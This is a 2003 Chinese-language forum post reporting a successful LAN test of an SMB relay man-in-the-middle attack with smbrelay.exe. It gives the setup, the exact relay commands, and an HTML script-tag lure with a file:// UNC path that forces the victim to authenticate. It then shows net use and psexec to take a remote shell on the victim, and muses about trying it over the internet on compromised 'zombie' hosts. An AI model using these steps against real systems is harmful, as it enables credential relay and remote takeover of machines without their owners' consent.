[讨论]smbrelay 中间人攻击在内网测试成功
[这个贴子最后由豆石在 2003/05/25 08:18pm 第 1 次编辑]
smbrealy.exe 在安全焦点 有下。
测试情况:
1、两台机子,攻击端机子 在本网段内有空余的 ip 。
2、攻击端机子 要关闭 文件与打印机共享。开启tcp/ip上的netbios (不然用psexec时会出错,53错误)。
3、被攻击端的机子要开启打印与文件共享、开启tcp/ip上的netbios (默认情况下,2000是开启的)
假设:
攻击端机子 192.168.0.3
被攻击端机子 192.168.0.5
虚拟 ip 192.168.0.10(不能存在该ip的机子)
步骤:
1、smbrelay.exe /e
找到用到的网卡 号。在此假设为 1000003
2、smbrelay.exe /il 100003 /ir 1000003 /L+ 192.168.0.10 /R- 192.168.0.10
3、在被攻击的机子上运行 该html 文件。
内容如下
〈script src=file://192.168.0.10/null.gif> 〈/script>
4、在攻击的机子上 运行 net use \\192.168.0.10 会提示连接成功;接着你就可以看到 被攻击机子的东西。
可以用 psexec.exe \\192.168.0.10 就可以相当于 telnet 上了192.168.0.5。假如被攻击机子是管理员权限上的话,你就可以做任何事情了 :)
以上在内网测试成功 。
在internet 由于没有适当的肉鸡,没有进行测试,应该也是可以的~~~~~ |
